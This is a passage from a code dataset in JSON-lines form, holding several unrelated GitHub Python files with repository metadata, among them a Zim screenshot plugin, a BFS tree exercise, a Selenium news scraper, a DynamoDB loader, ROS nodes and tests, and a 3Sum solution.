print(f\"获取my_dict中所有key组成的列表:{key_list}\")\n\n# # 六、遍历字典\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 
92}\n# # 6.1\n# keys = my_dict.keys() # 拿到字典中所有的key\n# for i in keys: # 遍历得到的keys\n# print(f\"1遍历my_dict的元素 {i} 的成绩为:{my_dict[i]}\")\n# # 6.2\n# for i in my_dict: # 遍历得到的keys\n# print(f\"2遍历my_dict的元素 {i} 的成绩为:{my_dict[i]}\")\n\n# # 七、统计字典内的元素数量:len(字典)\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# print(f\"字典my_dict的长度为{len(my_dict)}\")\n\n# 练习:对员工信息使用字典进行数据记录——循环遍历,级别为1的员工,级别上升1级,薪水增加1000元\nstaff_info = {\n \"小樱\": {\"部门\": \"科技部\", \"工资\": 3000, \"级别\": 1},\n \"王小明\": {\"部门\": \"市场部\", \"工资\": 5000, \"级别\": 2},\n \"知世\": {\"部门\": \"市场部\", \"工资\": 7000, \"级别\": 3},\n \"月\": {\"部门\": \"科技部\", \"工资\": 4000, \"级别\": 1},\n \"小可\": {\"部门\": \"市场部\", \"工资\": 6000, \"级别\": 2}\n}\nprint(f\"全体员工当前信息如下:{staff_info}\")\n\nfor name in staff_info:\n if staff_info[name][\"级别\"] == 1:\n staff_info[name][\"级别\"] += 1\n staff_info[name][\"工资\"] += 1000\n\nprint(f\"员工升值加薪后的结果:{staff_info}\")\n","repo_name":"WoHaoKun21/python","sub_path":"6第六章:python数据容器/10_Python字典的操作.py","file_name":"10_Python字典的操作.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21044564607","text":"import time\nimport logging\nimport platform\nfrom platform import os\n\nimport gtk\n\nfrom zim.plugins import PluginClass, WindowExtension, extends\nfrom zim.actions import action\nfrom zim.fs import TmpFile\nfrom zim.applications import Application, ApplicationError\nfrom zim.gui.widgets import ui_environment, Dialog, ErrorDialog\n\nlogger = logging.getLogger('zim.plugin.screenshot')\n\nPLATFORM = os.name\nif ui_environment['platform'] == 'maemo': # don't know what os.name return on maemo\n\tPLATFORM = 'maemo'\n\n\"\"\"\nTESTED:\n\t- import (imagemagick)\n\t- scrot\nUNTESTED:\n\t- boxcutter (windows, http://keepnote.org/boxcutter/)\n\t- screenshot-tool (maemo)\n\"\"\"\nCOMMAND = 'import'\nSUPPORTED_COMMANDS_BY_PLATFORM = dict([\n\t('posix', ('import', 'scrot', 'screencapture')),\n\t('nt', ('boxcutter', 'i_view32.exe', 'i_view64.exe')),\n\t('maemo', ('screenshot-tool',)),\n])\nSUPPORTED_COMMANDS = SUPPORTED_COMMANDS_BY_PLATFORM[PLATFORM]\nif len(SUPPORTED_COMMANDS):\n\tCOMMAND = SUPPORTED_COMMANDS[0] # set first available tool as default\n\n#WSL='Microsoft' in platform.uname().release;\nWSL1='Microsoft' in platform.uname()[3];\nWSL2='microsoft' in platform.uname()[2];\n\nif PLATFORM == 'posix' and ( WSL1 or WSL2 ):\n\tSUPPORTED_COMMANDS=SUPPORTED_COMMANDS+SUPPORTED_COMMANDS_BY_PLATFORM['nt']\n\nclass ScreenshotPicker(object):\n\tcmd_options = dict([\n\t\t('scrot', {\n\t\t\t'select': ('--select', '--border'),\n\t\t\t'full': ('--multidisp',),\n\t\t\t'delay': '-d',\n\t\t}),\n\t\t('import', {\n\t\t\t'select': ('-silent',),\n\t\t\t'full': ('-silent', '-window', 'root'),\n\t\t\t'delay': '-delay',\n\t\t}),\n\t\t('i_view32.exe', {\n\t\t\t'select': ('/capture=4',),\n\t\t\t'full': ('/capture=0'),\n\t\t\t'delay': None,\n\t\t\t'savePrefix': '/convert=',\n\t\t}),\n\t\t('i_view64.exe', {\n\t\t\t'select': ('/capture=4',),\n\t\t\t'full': ('/capture=0'),\n\t\t\t'delay': None,\n\t\t\t'savePrefix': '/convert=',\n\t\t}),\n\t\t('boxcutter', {\n\t\t\t'select': None,\n\t\t\t'full': ('--fullscreen',),\n\t\t\t'delay': None,\n\t\t}),\n\t\t('screencapture', {\n\t\t\t'select': ('-xs'),\n\t\t\t'full': None,\n\t\t\t'delay': None,\n\t\t}),\n\t\t('screenshot-tool', {\n\t\t\t'select': None,\n\t\t\t'full': (),\n\t\t\t'delay': '-d',\n\t\t})\n\t])\n\tcmd_default = COMMAND\n\tfinal_cmd_options = ()\n\n\tdef __init__(self, cmd, select=False, delay=0):\n\t\tcmd = 
self.select_cmd(cmd)\n\t\tscreenshot_mode = 'select' if select is True else 'full'\n\t\tself.final_cmd_options += self.cmd_options[cmd][screenshot_mode]\n\n\t\tif str(delay).isdigit() and int(delay) > 0 and self.cmd_options[cmd]['delay'] is not None:\n\t\t\tself.final_cmd_options += (self.cmd_options[cmd]['delay'], str(delay))\n\n\t@classmethod\n\tdef select_cmd(cls, cmd=None):\n\t\tif cmd is None or cmd not in SUPPORTED_COMMANDS or cmd not in cls.cmd_options:\n\t\t\tcmd = cls.cmd_default\n\t\treturn cmd\n\n\t@classmethod\n\tdef get_cmd_options(cls, cmd=None, select=False, delay=0):\n\t\tcmd = cls.select_cmd(cmd)\n\t\tdelay = delay if str(delay).isdigit() and int(delay) > 0 else 0\n\t\tme = cls(cmd, select, str(delay))\n\t\treturn me.final_cmd_options\n\n\t@classmethod\n\tdef has_delay_cmd(cls, cmd=None):\n\t\tcmd = cls.select_cmd(cmd)\n\t\treturn True if cls.cmd_options[cmd]['delay'] is not None else False\n\n\t@classmethod\n\tdef has_select_cmd(cls, cmd):\n\t\tcmd = cls.select_cmd(cmd)\n\t\treturn True if cls.cmd_options[cmd]['select'] is not None else False\n\n\nclass InsertScreenshotPlugin(PluginClass):\n\tplugin_info = {\n\t\t'name': _('Insert Screenshot (FASTER)'), # T: plugin name\n\t\t'description': _('''\\\nThis plugin allows taking a screenshot and directly insert it\nin a zim page without a confirmation dialog and at the impulse\nof a hot key or toolbar icon with slightly better and more descriptive\nfilenames (which can make a difference when sharing the images).\n\nThis is derived from (and is intended to replace [in operation]) a\ncore plugin that ships with zim with the same name.\n'''), # T: plugin description\n\t\t'author': 'Jaap Karssenberg',\n\t\t'help': 'Plugins:Insert Screenshot',\n\t}\n\tplugin_preferences = (\n\t\t# key, type, label, default\n\t\t('autohide', 'bool', _('Hide zim when taking a screenshot (good for small/single-monitor setups).'), False),\n\t\t('screenshot_command', 'choice', _('Screenshot Command'), COMMAND, SUPPORTED_COMMANDS), # T: plugin preference\n\t)\n\tscreenshot_cmd = COMMAND\n\n\tdef __init__(self, config=None):\n\t\tPluginClass.__init__(self, config)\n\t\tself.on_preferences_changed(self.preferences)\n\t\tself.preferences.connect('changed', self.on_preferences_changed)\n\n\tdef on_preferences_changed(self, preferences):\n\t\tself.screenshot_cmd = preferences['screenshot_command']\n\n\t@classmethod\n\tdef check_dependencies(cls):\n\t\tcmds = []\n\t\tis_ok = False\n\t\tif len(SUPPORTED_COMMANDS):\n\t\t\tfor cmd in SUPPORTED_COMMANDS:\n\t\t\t\thas_tool = Application(cmd).tryexec()\n\t\t\t\tif has_tool:\n\t\t\t\t\tis_ok = True\n\t\t\t\t\tcmds.append((cmd, True, False))\n\t\t\t\telse:\n\t\t\t\t\tcmds.append((cmd, False, False))\n\t\treturn is_ok, cmds\n\n\n@extends('MainWindow')\nclass MainWindowExtension(WindowExtension):\n\tuimanager_xml = '''\n\t\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\t'''\n\tscreenshot_command = COMMAND\n\tplugin = None\n\tpngquant = Application('pngquant')\n\tonImageInserted = Application('zim-on-image-inserted')\n\n\tdef __init__(self, plugin, window):\n\t\tWindowExtension.__init__(self, plugin, window)\n\t\tself.on_preferences_changed(plugin.preferences)\n\t\tself.connectto(plugin.preferences, 'changed', self.on_preferences_changed)\n\t\tself.plugin = plugin\n\n\tdef on_preferences_changed(self, preferences):\n\t\tif preferences['screenshot_command']:\n\t\t\tself.screenshot_command = 
preferences['screenshot_command']\n\n\t@action(\n\t\t_('_Screenshot...'),\n\t\tstock=gtk.STOCK_LEAVE_FULLSCREEN,\n\t\treadonly=True,\n\t\taccelerator = 'U'\n\t) # T: menu item for insert screenshot plugin\n\tdef insert_screenshot(self):\n\t\tnotebook = self.window.ui.notebook # XXX\n\t\tpage = self.window.ui.page # XXX\n\n\t\ttmpfile = TmpFile('insert-screenshot.png')\n\t\tselection_mode = True\n\t\tdelay = 0\n\n\t\t#delay = self.time_spin.get_value_as_int()\n\t\tprefix = page.name.replace(':','-')\n\n\t\toptions = ScreenshotPicker.get_cmd_options(self.screenshot_command, selection_mode, str(delay))\n\t\thelper = Application((self.screenshot_command,) + options)\n\n\t\tdef callback(status, tmpfile):\n\t\t\tif self.plugin.preferences['autohide']:\n\t\t\t\tself.window.present()\n\t\t\tif status == helper.STATUS_OK:\n\t\t\t\tname = prefix+'-'+(\"%x\" % time.time())+'.png'\n\t\t\t\timgdir = notebook.get_attachments_dir(page)\n\t\t\t\timgfile = imgdir.new_file(name)\n\t\t\t\tif self.pngquant.tryexec():\n\t\t\t\t\timgfile.parent().touch();\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.pngquant.run(('--skip-if-larger',tmpfile,'--output',imgfile,))\n\t\t\t\t\t\tif os.path.isfile(imgfile.encodedpath):\n\t\t\t\t\t\t\tlogger.info(\"png8 conversion successful\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttmpfile.rename(imgfile);\n\t\t\t\t\texcept ApplicationError as e:\n\t\t\t\t\t\t# pngquant returns 98 if the resulting file would be larger, which throws an exception\n\t\t\t\t\t\ttmpfile.rename(imgfile);\n\t\t\t\telse:\n\t\t\t\t\ttmpfile.rename(imgfile)\n\n\t\t\t\tif hasattr(self.window.ui, 'mainwindow'):\n\t\t\t\t\tpageview = self.window.ui.mainwindow.pageview\n\t\t\t\telse:\n\t\t\t\t\tpageview = self.window.pageview\n\n\t\t\t\tpageview.insert_image(imgfile, interactive=False, force=True)\n\n\t\t\t\tif self.onImageInserted.tryexec():\n\t\t\t\t\tself.onImageInserted.run((imgfile, notebook.dir, page.name));\n\t\t\t\telse:\n\t\t\t\t\tlogger.debug(\"dne: %s\"%self.onImageInserted);\n\t\t\telse:\n\t\t\t\tErrorDialog(self.window.ui,\n\t\t\t\t\t\t\t_('Some error occurred while running \"%s\"') % self.screenshot_command).run()\n\t\t\t\t# T: Error message in \"insert screenshot\" dialog, %s will be replaced by application name\n\n\t\tsavePrefix = '';\n\t\toptions=ScreenshotPicker(COMMAND).cmd_options[self.screenshot_command];\n\t\tif 'savePrefix' in options:\n\t\t\tsavePrefix = options['savePrefix'];\n\n\t\ttmpfile.dir.touch()\n\t\thelper.spawn((savePrefix+tmpfile.basename,), callback, tmpfile, tmpfile.dir)\n\n\t\tif self.plugin.preferences['autohide']:\n\t\t\tself.window.iconify()\n\n\t\treturn True\n","repo_name":"Osndok/zim-plugin-screenshot2","sub_path":"screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"10945624212","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n\n def insert(self,data):\n if self.data is not None:\n if self.data > data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif self.data < data:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n print(\"Already Present\")\n\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n\ndef traversal(root,point):\n if root is None:\n return\n queue = []\n queue.append(root)\n while len(queue) != 0:\n if queue[0].data == 
point:\n print(queue[0].data)\n break\n print(queue[0].data)\n node = queue.pop(0)\n\n if node.left is not None:\n queue.append(node.left)\n if node.right is not None:\n queue.append(node.right)\n \n\n \ndef main():\n arr = list(map(int,input(\"Please enter the elements : \").split()))\n\n for i in range(len(arr)):\n if i == 0:\n root = Node(arr[i])\n else:\n root.insert(arr[i])\n\n #root.print_tree()\n traversal(root,15)\n \nmain()\n","repo_name":"Shikhar0907/Algo-and-data-structure-questions","sub_path":"Amazon_interview/Binary Tree/Jumping the Subtree using BSF.py","file_name":"Jumping the Subtree using BSF.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13919725696","text":"import requests\nfrom bs4 import BeautifulSoup as BS\nimport pandas as pd\nfrom selenium import * \nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\nfrom selenium.webdriver.common.by import By\n\n# url_Peliculas = 'https://www.starz.com/ar/es/movies'\n# url_Series = 'https://www.starz.com/ar/es/series'\n\n# pagina = requests.get(url_Peliculas)\n\n\n#url = 'https://www.starz.com/ar/es/movies' #\n#search = requests.get(url) #\n#print(f'El status es: {search.status_code}')\n\n#print(search.content)\n\n\n#soup = BS(search.content, features=\"html.parser\")\n\n#soup.prettify\n\n#\n#elements = soup.find_all(attrs = {\"class\": \"on-hover metadata-items\"})\n#print(elements)\n\n\n##################################\npath_driver = 'C:/Users/Admin/scrappers/chromedriver.exe'\nchrome_options = Options()\n#chrome_options.add_argument(\"--headless\")\n\n#\n# Creación del navegador\ndriver = webdriver.Chrome(executable_path = path_driver, options = chrome_options)\n\n\n# Visitamos la página y esperamos 5 segundos a que todo cargue bien\ndriver.get(\"https://www.lanacion.com.ar/\")\ntime.sleep(5)\n\nelements = driver.find_elements_by_class_name(\"com-title --xs\")\n\n\nfor iteration in range(6):\n driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight);\")\n time.sleep(2)\n\n# Ahora guardamos los enlaces de cada elemento\nhrefs = []\nfor element in elements:\n try:\n href = element.find_elements_by_tag_name('a')\n \n hrefs.append(href)\n except:\n pass\n\n\nprint(hrefs)\n\n# # Guardamos los enlaces en un archivo\n# fp = open('links.txt','w')\n# for href in hrefs:\n# \tfp.write(href + '\\n')\n# fp.close()\n\n\ndriver.close()\ndriver.quit()\n\n\n\n\n\n\n# urls = []\n# for element in elements:\n# try:\n# urls.append(element.find('h6')['class'])\n# except:\n# pass\n\n# print(urls)\n\n# print(len(urls))\n\n# search_parseada = bs(search.content, 'html.parser') # Parseamos el contenido del request como un html\n# print(search_parseada.prettify()[:20000]) \n\n\n# tag_deptos = search_parseada.findAll(name = 'div', attrs = {'class' : 'listing__item'})\n\n# soup = BeautifulSoup(pagina.content, 'html.parser') features=\"html.parser\"\n\n# result = soup.find_all(lambda tag: tag.name == 'h6' and tag.get('class') == ['on-hover metadata-items'])\n\n\n# print(result)\n\n\n","repo_name":"Mauroemg/testScrapping","sub_path":"conDiarioLaNacion.py","file_name":"conDiarioLaNacion.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73837488407","text":"import json\nimport boto3\nfrom pprint import pprint\n\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1', 
endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\ntable = dynamodb.Table('courses')\n\n#sample data\n\"\"\"\n{\n \"title\": \"Java fundamentals\",\n \"desc\": \"Learning java\",\n \"courseid\": \"ENSF607\"\n}\n\"\"\"\n\nwith open('input_data.json') as json_file:\n courses = json.load(json_file)\n for course in courses:\n courseid = course['courseid']\n desc = course['desc']\n title = course['title']\n \n response = table.put_item(\n Item = {\n 'courseid':courseid,\n 'desc':desc,\n 'title':title,\n }\n )\n print(\"Put item succeeded\")\n print(json.dumps(response, indent=4))","repo_name":"soumoks/aws-workshop","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13470337157","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\nimport sys\nimport random\nfrom abstractclass_unittest_dyadic import Abstractclass_Unittest_Dyadic\n\n\nclass ArgProbD_Test(Abstractclass_Unittest_Dyadic):\n def __init__(self, *args):\n super(ArgProbD_Test, self).__init__(*args)\n self._unique_id = \"argprobd\"\n self.__params = {\"qsr_relations_and_values\": {\"close\": (10, 10/2), \"near\": (20, 20/2),\n \"far\": (30, 30/2), \"veryfar\": (40, 40/2)}}\n self.__seed = 100\n\n def test_defaults(self):\n # with bounding boxes\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n # without bounding boxes\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data3\", \"data3_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n # floats\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data4\", \"data4_argprobd_defaults.txt\", {self._unique_id: self.__params}))\n\n def test_qsrs_for_global_namespace(self):\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_global_namespace.txt\",\n {\"for_all_qsrs\": {\"qsrs_for\": [(\"o2\", \"o1\")]}, self._unique_id: self.__params}))\n\n def test_qsrs_for_qsr_namespace(self):\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_qsr_namespace.txt\",\n {self._unique_id: {\"qsrs_for\": [(\"o1\", \"o2\")],\n \"qsr_relations_and_values\": self.__params[\"qsr_relations_and_values\"]}}))\n random.seed(self.__seed)\n self.assertItemsEqual(*self.custom(\"data2\", \"data2_argprobd_qsrs_for_qsr_namespace.txt\",\n {\"for_all_qsrs\": {\"qsrs_for\": [(\"o2\", \"o1\")]},\n self._unique_id: {\"qsrs_for\": [(\"o1\", \"o2\")],\n \"qsr_relations_and_values\": self.__params[\"qsr_relations_and_values\"]}}))\n\n\nif __name__ == '__main__':\n import rosunit\n rosunit.unitrun(\"qsr_lib\", \"argprobd_test\", ArgProbD_Test, sys.argv)\n","repo_name":"strands-project/strands_qsr_lib","sub_path":"qsr_lib/tests/argprobd_tester.py","file_name":"argprobd_tester.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"43715029270","text":"from setuptools import setup, find_packages\nimport os.path as path\n\nlong_desc = open(path.join(path.dirname(__file__), \"README.md\")).read()\n\nsetup(\n name=\"football-table\",\n version=\"0.0.1\",\n author=\"Dan Walters\",\n author_email=\"dan.walters5@outlook.com\",\n description=\"A CLI to do football tables\",\n url=\"https://github.com/dwdwdan/football-table\",\n 
package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n python_requires=\">=3.6\",\n install_requires=[],\n entry_points={\n \"console_scripts\": [\n \"football-table=football_table.cli:main\",\n ]\n },\n long_description=long_desc,\n long_description_content_type=\"text/markdown\",\n)\n","repo_name":"dwdwdan/football-table","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31167508221","text":"import sys\r\n\r\nsys.path.append('..')\r\n\r\nfrom src.Element import Element\r\n\r\nclass Wall(Element):\r\n \"\"\"\r\n A class to represent a wall.\r\n ...\r\n \r\n Parameters\r\n ----------\r\n coordinates : Tuple of Coordiante\r\n The coordinate of the wall\r\n\r\n Attributes\r\n ----------\r\n listWindow : List\r\n The list of window on the wall\r\n listDoor : List\r\n The list of door on the wall\r\n listCanBeContain: List\r\n The list of list of 2 coordinates where we can add a new element\r\n vector: Numpy Array\r\n The vector of coordinates\r\n\r\n Methods\r\n -------\r\n getVector():\r\n Get the attribute vector \r\n getListCanBeContain():\r\n Get the attribute listCanBeContain\r\n getLength(coordinate):\r\n Return the length of two coordinate\r\n listContainAfterAddingElement(element):\r\n Return true if we can add the element on the wall and add it, false else\r\n canBeContain(selfcoordinate,elem):\r\n Return true if the coordiante of elem are on the sequence of selfcoordinate\r\n addWindow(window):\r\n Add window if possible\r\n addDoor(door):\r\n Add door if possible\r\n getListWindow():\r\n Get the list of window \r\n getListDoor():\r\n Get the list of door\r\n \"\"\"\r\n def __init__(self,coordinates):\r\n super().__init__(coordinates)\r\n self.__listWindow = []\r\n self.__listDoor=[]\r\n self.__listCanBeContain=[[self.getCoordinates()[0],self.getCoordinates()[1]]]\r\n self.__vector=self.getCoordinates()[0].getVector(self.getCoordinates()[1]) #vecteur associé au mur\r\n\r\n \r\n def getVector(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE Numpy Array\r\n Get the vector of the coordiantes\r\n '''\r\n return self.__vector\r\n \r\n def getListCanBeContain(self):\r\n '''\r\n Returns\r\n -------\r\n TYPE List\r\n Get the list of list of 2 coordinates where can we add a window or door\r\n '''\r\n return self.__listCanBeContain\r\n \r\n \r\n def listContainAfterAddingElement(self,element):\r\n '''\r\n Parameters\r\n ----------\r\n element : Element(window or door)\r\n The element that we hope add on the wall\r\n\r\n Returns\r\n -------\r\n found : Boolean\r\n Return true if we can add element to the wall, false else\r\n '''\r\n found = False\r\n for i in range(len(self.__listCanBeContain)):\r\n if self.canBeContain(self.__listCanBeContain[i], element):\r\n found = True\r\n if element.getCoordinates()[0] == self.__listCanBeContain[i][0]:\r\n if element.getCoordinates()[1] != self.__listCanBeContain[i][1]:\r\n self.__listCanBeContain[i][0]=element.getCoordinates()[1]\r\n else:\r\n self.__listContain.remove(self.__listCanBeContain[i])\r\n elif element.getCoordinates()[1] == self.__listCanBeContain[i][1]:\r\n self.__listCanBeContain[i][1]=element.getCoordinates()[0]\r\n else:\r\n self.__listCanBeContain.append([element.getCoordinates()[1],self.__listCanBeContain[i][1]])\r\n self.__listCanBeContain[i][1]=element.getCoordinates()[0]\r\n return found\r\n return found\r\n \r\n def canBeContain(self,selfcoordinate,element):\r\n '''\r\n 
Parameters\r\n        ----------\r\n        selfcoordinate : List\r\n            The list of 2 coordinates where we try to add element\r\n        element : Element\r\n            The element that we hope to add\r\n\r\n        Returns\r\n        -------\r\n        TYPE Boolean\r\n            Return True if the coordinates of element are in the sequence of the coordinates of selfcoordinate\r\n        '''\r\n        isAfter1 = selfcoordinate[0].isAfter(element.getCoordinates()[0])\r\n        isBefore1 = element.getCoordinates()[1].isAfter(selfcoordinate[1])\r\n        isAfter2 = selfcoordinate[0].isAfter(element.getCoordinates()[1])\r\n        isBefore2 = element.getCoordinates()[0].isAfter(selfcoordinate[1])\r\n        onTheLine1 = selfcoordinate[0].onTheLine(selfcoordinate[1],element.getCoordinates()[0])\r\n        onTheLine2 = selfcoordinate[0].onTheLine(selfcoordinate[1],element.getCoordinates()[1])\r\n        return isAfter1 and isBefore1 and onTheLine1 and onTheLine2 and isAfter2 and isBefore2\r\n    \r\n    def addWindow(self,window):\r\n        '''\r\n        Parameters\r\n        ----------\r\n        window : Window\r\n            The window that we hope to add on the wall\r\n\r\n        Returns\r\n        -------\r\n        None. (adds the window to the wall if possible)\r\n\r\n        '''\r\n        if (window not in self.__listWindow) and (self.listContainAfterAddingElement(window)):\r\n            self.__listWindow.append(window)\r\n    \r\n    def addDoor(self,door):\r\n        '''\r\n        Parameters\r\n        ----------\r\n        door : Door\r\n            The door that we hope to add on the wall\r\n\r\n        Returns\r\n        -------\r\n        None. (adds the door to the wall if possible)\r\n\r\n        '''\r\n        if (door not in self.__listDoor) and (self.listContainAfterAddingElement(door)):\r\n            self.__listDoor.append(door)\r\n    \r\n    def getListWindow(self):\r\n        '''\r\n        Returns\r\n        -------\r\n        TYPE List\r\n            The list of windows on the wall\r\n        '''\r\n        return self.__listWindow\r\n    \r\n    def getListDoor(self):\r\n        '''\r\n        Returns\r\n        -------\r\n        TYPE List\r\n            The list of doors on the wall\r\n        '''\r\n        return self.__listDoor\r\n","repo_name":"yassinhc/Building_digital","sub_path":"src/Wall.py","file_name":"Wall.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1002130497","text":"#!/usr/bin/env python\n# license removed for brevity\n\"\"\"\nTest ROS Node to chatter and produce values we want for testing.
Currently setup to give us desired encoder positions.\n\n@author Shashank Swaminathan\n\"\"\"\nimport rospy\nfrom std_msgs.msg import String\nimport numpy as np\n\nclass Johnny:\n def __init__(self, r):\n self.john = [0,0,0,0,0,0]\n # self.pub_d = rospy.Publisher('/des_pos/robot1', String, queue_size=10)\n self.pub_d = rospy.Publisher('/motor_ctrls/robot1', String, queue_size=10)\n # self.pub_e = rospy.Publisher('/encoder_data/robot1', String, queue_size=10)\n # rospy.Subscriber(\"/curr_pos/robot1\", String, self.cb)\n rospy.init_node('talker', anonymous=True)\n self.rate = rospy.Rate(r) # 10hz\n def run(self, k):\n # posx=np.cos(np.linspace(0,2*np.pi,100))*k\n # posy=np.sin(np.linspace(0,2*np.pi,100))*k\n # counter=x=y=0\n while not rospy.is_shutdown():\n # time=rospy.get_time()\n # if self.john[5] != 1:\n # x=0\n # y=0\n # else:\n # x=posx[counter]\n # y=posy[counter]\n # counter = (counter + 1) % 100\n\n # # epos = ','.join(list(map(str,[x,y,time])))\n dpos = ','.join(list(map(str,[100,100,0])))\n rospy.loginfo(dpos)\n # self.pub_e.publish(epos)\n self.pub_d.publish(dpos)\n self.rate.sleep()\n\n def cb(self, msg):\n self.john = list(map(float, msg.data.split(',')))\n\nif __name__ == '__main__':\n try:\n johnny = Johnny(0.7)\n johnny.run(4)\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Kristtiya/POE_Inkscape","sub_path":"inkscape_ws/src/test_foo/src/talker.py","file_name":"talker.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32324412485","text":"# 3Sum\n# Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]]\n# such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n# Notice that the solution set must not contain duplicate triplets.\n# Scott 2021/07/30\nclass Solution:\n\n # Original\n # Relatively Efficient 60.53%\n # Double index with sorted list\n def threeSum(self, nums: list[int]) -> list[list[int]]:\n length = len(nums)\n if length < 3:\n return []\n nums.sort()\n result = []\n for index in range(length):\n if index and nums[index] == nums[index - 1]:\n continue\n i = index + 1\n j = length - 1\n while i < j:\n sum = nums[index] + nums[i] + nums[j]\n if sum == 0:\n result.append([nums[index], nums[i], nums[j]])\n # Move both left and right pointers\n i += 1\n # If current value is still equal to the previous one, continue increasing\n while (i < j and nums[i] == nums[i - 1]):\n i += 1\n j -= 1\n while (i < j and nums[j] == nums[j + 1]):\n j -= 1\n elif sum > 0:\n j -= 1\n elif sum < 0:\n i += 1\n return result\n\n\nif __name__ == \"__main__\":\n print(Solution().threeSum([-1, 0, 1, 2, -1, -4]),\n [[-1, -1, 2], [-1, 0, 1]])\n print(Solution().threeSum([]), [])\n print(Solution().threeSum([0]), [])\n","repo_name":"ScottCTD/Programming-Practices","sub_path":"LeetCode/python/Q15.py","file_name":"Q15.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74890633686","text":"import os\nimport subprocess\n\n\ndef exportImage(filename, fig=None, type=\"pgf\", **kwargs):\n ''' Export a Matplotlib figure to file\n\t\ttype: Defines the type of the exported figure\n\t\t\t - \"pgf\":exports the pgf with the corresponding pdf\n\t\t\t - \"all\": does both\n\t'''\n\n # remove filename ending\n file = os.path.basename(filename)\n dir = os.path.dirname(filename)\n filename = os.path.join(dir, os.path.splitext(file)[0])\n\n if 
type == \"pgf\" or type == \"all\":\n fig.savefig(filename + \".pdf\", **kwargs)\n fig.savefig(filename + \".pgf\", **kwargs)\n\n if type == \"emf\" or type == \"all\":\n fig.savefig(filename + \".svg\", **kwargs)\n\n if type == \"png\":\n fig.savefig(filename + \".png\", **kwargs)\n\n\n\ndef convertToEmf(filename):\n dummy_ending = \".pdf\"\n dummy_export_param = \"--export-pdf\"\n\n emf_ending = \".emf\"\n emf_export_param = \"--export-emf\"\n\n # remove filename ending\n file = os.path.basename(filename)\n dir = os.path.dirname(filename)\n filename_emf = os.path.splitext(file)[0] + \"_converted\" + dummy_ending\n cmd = \"inkscape\" + \" \" + file + \" \" + dummy_export_param+\"=\"+filename_emf\n os.chdir(dir)\n os.listdir()\n output = subprocess.call(cmd, shell=True)\n print(output)\n\n\n\nif __name__ == \"__main__\":\n convertToEmf(\"/home/bernhard/development/jb_git/Programming/IV2018/programming/NNPlanner/results_paper/figures/parking_scenarios_0.svg\")\n\n\n\n\n\n","repo_name":"juloberno/diadem","sub_path":"diadem/experiment/evaluation/export/export_image.py","file_name":"export_image.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26352055830","text":"import cv2\nimport numpy as np\nimport copy\nimport glob\n\nimages = glob.glob('*.jpg')\n\nfor im in images:\n img = cv2.imread(im)\n\n cimg = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n img2 = cv2.medianBlur(cimg,13)\n\n ret,thresh1 = cv2.threshold(cimg,100,120,cv2.THRESH_BINARY)\n t2 = copy.copy(thresh1)\n th3 = cv2.adaptiveThreshold(img2,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n image, contours, hierarchy = 